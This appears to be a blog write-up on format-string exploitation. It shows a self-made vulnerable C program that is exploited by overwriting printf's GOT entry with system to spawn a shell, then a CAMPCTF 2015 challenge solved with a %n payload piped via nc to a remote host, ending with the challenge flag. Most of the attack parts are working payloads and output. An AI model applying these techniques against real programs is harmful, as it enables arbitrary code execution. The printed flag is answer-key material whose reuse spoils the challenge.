Format String Exploit (OverWrite GOT)

Format String vulnerabilities seems very simple but they are very powerful. They are silly mistakes made the programmers.
In the problem given below (I have designed on my own 😛 ) there is Format String that is casing the attacker to take advantage of the problem and do some manipulation which he is not supposed do.

#include

int main(int argc,char **argv) {

char buf[100];
printf("Welcome to Format String Attack !!!!!!!\n");
printf("Hello ");
strncpy(buf,argv[1],100);
printf(buf);
printf(buf);
return 0;

}

Here your are supposed to give your name as argument. But what will a clever hacker do.

➜  ./format "%x-%x-%x-%x-%x-%x-%x-%x-%x"         
Welcome to Format String Attack !!!!!!!
Hello ffffd965-64-ffffd7b4-ffffd754-ffffd6c8-252d7825-78252d78-2d78252d-252d7825ffffd965-64-ffffd7b4-ffffd754-ffffd6c8-252d7825-78252d78-2d78252d-252d7825%             

So form this payload we got know that we can leak the address on the stack. If you clearly observe the output you will notice that input itself is been printed which is on the stack. There is one interesting format specifier for printf which is “%n”. From the MAN of printf

The number of characters written so far is stored into the integer and that value is written into the dereferenced address of which it is pointing.

So for the input “AAAA%6$n” the value 4 will be written into the address 0x41414141. So taking this as advantage, we will try to overwrite the address of GOT of printf which is already been called once and spawn the shell.

 ➜objdump -d format
 
 08048370 <printf@plt>:
 8048370:       ff 25 0c a0 04 08       jmp    *0x804a00c
 8048376:       68 00 00 00 00          push   $0x0
 804837b:       e9 e0 ff ff ff          jmp    8048360 <_init+0x28>

➜gdb -q format
b *main 
Breakpoint 1 at 0x80484cd
r
Breakpoint 1, 0x080484cd in main ()
p system
$1 = {} 0xf7e49190 

So we should write the address of system form libc(0xf7e49190) into the address of “0x804a00c”.
The way to give padding is

0x9190 - 12 = 37252 
0xf7e4 - 0x9190 = 26196

12 is bytes that as been given before which is “sh;#\x0c\xa0\x04\x08\x0e\xa0\x04\x08”.
I will overwrite 2 bytes of data at a time for which i will use ‘h’ before n.
Here is my exploit for that

./format $(python -c 'print "sh;#\x0c\xa0\x04\x08\x0e\xa0\x04\x08%37252x%7$hn%26196x%8$hn"')

So this exploit will spawn you a shell.

hacker_level 200 CAMPCTF – 2015

This is other exploit problem that i have solved with the help of my friend. This was very simple challenge of FORMAT STRING venerability. As source code was given it has became more easy to solve the challenge.
The venerability of this challenge lies in

        usleep(150000);
        printf("Hello, ");
        printf(name);

printf(name) that is next to printf(“Hello, “).
So the main goal of this challenge is to change the value of level to 0xCCC31337 using format string. Here the main problem is that the variable level is not on stack it is in .bss section. Seeing all this i remember solving same type of challenge in ‘Exploit-exercises’ which is Format:level3. So solving that challenge again i have solved this challenge.

Finally here is the exploit:

python -c 'print "\x4c\xa0\x04\x08"+ "\x4d\xa0\x04\x08"+ "\x4e\xa0\x04\x08" + "\x4f\xa0\x04\x08 "  + "%294u%7$n" + "%220u%8$n" + "%176u%9$n"+ "%265u%10$n"' | nc 144.76.92.167 10118

And flag of this challenge is : CAMP15_337deec05ccc63b1168ba3379ae4d65854132604